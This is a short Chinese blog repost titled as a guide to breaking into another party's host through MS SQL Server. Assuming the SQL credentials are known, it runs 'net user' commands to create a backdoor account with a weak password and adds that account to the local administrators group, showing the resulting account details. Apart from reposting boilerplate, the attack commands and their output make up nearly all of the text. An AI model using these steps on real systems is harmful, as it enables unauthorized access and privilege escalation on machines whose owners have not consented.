从Mssql入手侵入对方主机

本文介绍如何通过已知的MS SQL Server用户名和密码远程执行命令,包括添加新用户、查看用户信息及将其提升为管理员等操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 假设知道了对方Ms SQL Server的用户名和密码:

 

连上了,接下来可以执行一些dos命令。

net user查看下用户:

 

执行

net user test 123456 /add

添加一个用户test密码为123456

下面执行 net user test

查看下帐号test的详细信息:

 

 
 
  1. 用户名                 test 
  2.  
  3. 全名                    
  4.  
  5. 注释                    
  6.  
  7. 用户的注释              
  8.  
  9. 国家(地区)代码         000 (系统默认值) 
  10.  
  11. 帐户启用               Yes 
  12.  
  13. 帐户到期               从不 
  14.  
  15.  
  16.  
  17. 上次设置密码           2011/1/4 下午 10:01 
  18.  
  19. 密码到期               2011/2/16 下午 08:49 
  20.  
  21. 密码可更改             2011/1/4 下午 10:01 
  22.  
  23. 需要密码               Yes 
  24.  
  25. 用户可以更改密码       Yes 
  26.  
  27.  
  28.  
  29. 允许的工作站           All 
  30.  
  31. 登录脚本                
  32.  
  33. 用户配置文件            
  34.  
  35. 主目录                  
  36.  
  37. 上次登录               从不 
  38.  
  39.  
  40.  
  41. 可允许的登录小时数     All 
  42.  
  43.  
  44.  
  45. 本地组成员             *Users                 
  46.  
  47. 全局组成员             *None                  
  48.  
  49. 命令成功完成。 

 

现在把他加入管理员组 net localgroup administrators test /add

net user test再查看下。

 

 

 

 

 本文转自 xcf007 51CTO博客,原文链接:http://blog.51cto.com/xcf007/471921,如需转载请自行联系原作者

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值